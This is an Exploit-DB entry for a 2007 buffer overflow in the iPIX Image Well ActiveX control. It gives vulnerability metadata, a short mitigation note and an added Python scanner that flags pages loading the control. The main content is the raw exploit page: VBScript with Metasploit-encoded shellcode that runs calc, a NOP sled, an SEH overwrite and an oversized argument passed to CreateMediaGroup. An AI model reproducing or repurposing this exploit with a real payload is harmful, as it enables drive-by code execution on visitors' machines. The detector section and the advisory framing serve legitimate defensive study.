Vendor: Image Well ActiveX
By: Umesh Wanve
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Image Well ActiveX
Patch Exists: NO
Platforms Tested: Windows 2000 SP4 Server English, Windows 2000 SP4 Professional English
Year: 2007

IPIX Image Well ActiveX Buffer Overflow Exploit

This exploit targets the iPIX Image Well ActiveX control, specifically the CreateMediaGroup method. The vulnerability allows an attacker to execute arbitrary code by passing specially crafted parameters to the method. The exploit code includes shellcode that executes the calc.exe program.

Mitigation:

The vendor should release a patch or update to fix the buffer overflow vulnerability. In the meantime, users should avoid visiting untrusted websites or downloading untrusted ActiveX controls.
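
For defenders reviewing proxy captures or saved pages, the following added example (not part of the original entry or the exploit author's code) flags HTML that instantiates the control by the CLSID or ProgID shown in the exploit listing on this page and calls the methods it names. The `LONG_ARG` threshold, the finding labels and the sample pages are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Identifiers copied from the exploit listing on this page.
CLSID = "f7a05bac-9778-410a-9cde-bfbd4d5d2b7f"
PROGID = "pwactiveximgctllib.pwmediasendcontrol"
METHODS = ("CreateMediaGroup", "EndMediaGroup")
LONG_ARG = 1024  # assumed threshold for a suspicious String(n, c) fill

class Collector(HTMLParser):
    """Records <object> ids bound to the control and all script text."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.script, self.in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "object" and CLSID in attrs.get("classid", "").lower():
            self.object_ids.append(attrs.get("id", ""))
        self.in_script = tag == "script"
    def handle_endtag(self, tag):
        self.in_script = False
    def handle_data(self, data):
        if self.in_script:
            self.script.append(data)

def scan_page(html):
    """Return findings for one HTML document; an empty list means clean."""
    c = Collector()
    c.feed(html)
    c.close()
    script = "".join(c.script)
    findings = ["clsid"] if c.object_ids else []
    if PROGID in script.lower():
        findings.append("progid")
    for method in METHODS:  # VBScript is case-insensitive, so match that way
        if re.search(r"\.\s*" + method + r"\b", script, re.I):
            findings.append("call:" + method)
    fills = [int(n) for n in re.findall(r"\bString\s*\(\s*(\d+)", script, re.I)]
    if any(n >= LONG_ARG for n in fills):
        findings.append("long-fill:%d" % max(fills))
    return findings

# Constructed sample pages (not captured traffic, no payload).
SAMPLE_HIT = ('<OBJECT ID="ctl" ClassID="CLSID:F7A05BAC-9778-410A-9CDE-BFBD4D5D2B7F">'
              '</OBJECT><script language="vbscript">\na = String(5000, "A")\n'
              'ctl.createmediagroup a, "u", "g", 1, "s", "i"\n</script>')
SAMPLE_CLEAN = '<script>var s = "CreateMediaGroup docs";</script>'
if __name__ == "__main__":
    print(scan_page(SAMPLE_HIT), scan_page(SAMPLE_CLEAN))
```

A `clsid` or `progid` finding on its own only shows that a page loads the control; the combination with a method call and a long fill is the pattern worth triaging first.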

Exploit-DB raw data:

<!--

  ===============================================================================================
                        IPIX Image Well ActiveX (iPIX-ImageWell-ipix.dll) Buffer Overflow Exploit
                                            By Umesh Wanve 
  ==============================================================================================   
        
  Date : 27-04-2007
 
  Reference: http://securityfocus.com/bid/23379

  Tested on Windows 2000 SP4 Server English
            Windows 2000 SP4 Professional English
 
  Desc: Many methods are vulnerable and also all parameters.
        Methods: .EndMediaGroup , .CreateMediaGroup
       
 
  PS. This was written for educational purpose. Use it at your own risk. Author will not be
      responsible for any damage.
 
  Always thanks to Metasploit and Stroke 

-->


<html>

<body>

<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:F7A05BAC-9778-410A-9CDE-BFBD4D5D2B7F" > </OBJECT>

<script language="vbscript">

targetFile = "C:\test\iPIX-ImageWell-ipix\iPIX-ImageWell-ipix.dll"
prototype  = "Function CreateMediaGroup ( ByVal bUserID As String ,  ByVal bPassword As String ,  ByVal bGroupHandle As String ,  ByVal 
NumElements As Integer ,  ByVal bServiceType As String ,  ByVal bIPAddr As String ) As Integer"
memberName = "CreateMediaGroup"
progid     = "PWACTIVEXIMGCTLLib.PWMediaSendControl"
argCount   = 6


<!-- win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com  -->


shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")
shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")
shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")
shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")
shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")
shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")


nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90")                    

pointer_to_seh=unescape("%eb%06%90%90")

seh_handler=unescape("%a9%11%02%75")


arg1=String(4365, "A")
arg2="defaultV"
arg3="defaultV"
arg4=1
arg5="defaultV"
arg6="defaultV"


arg1=arg1+pointer_to_seh+seh_handler+nop+shellcode+nop

target.CreateMediaGroup arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 


</script>
</body>
</html>

# milw0rm.com [2007-04-27]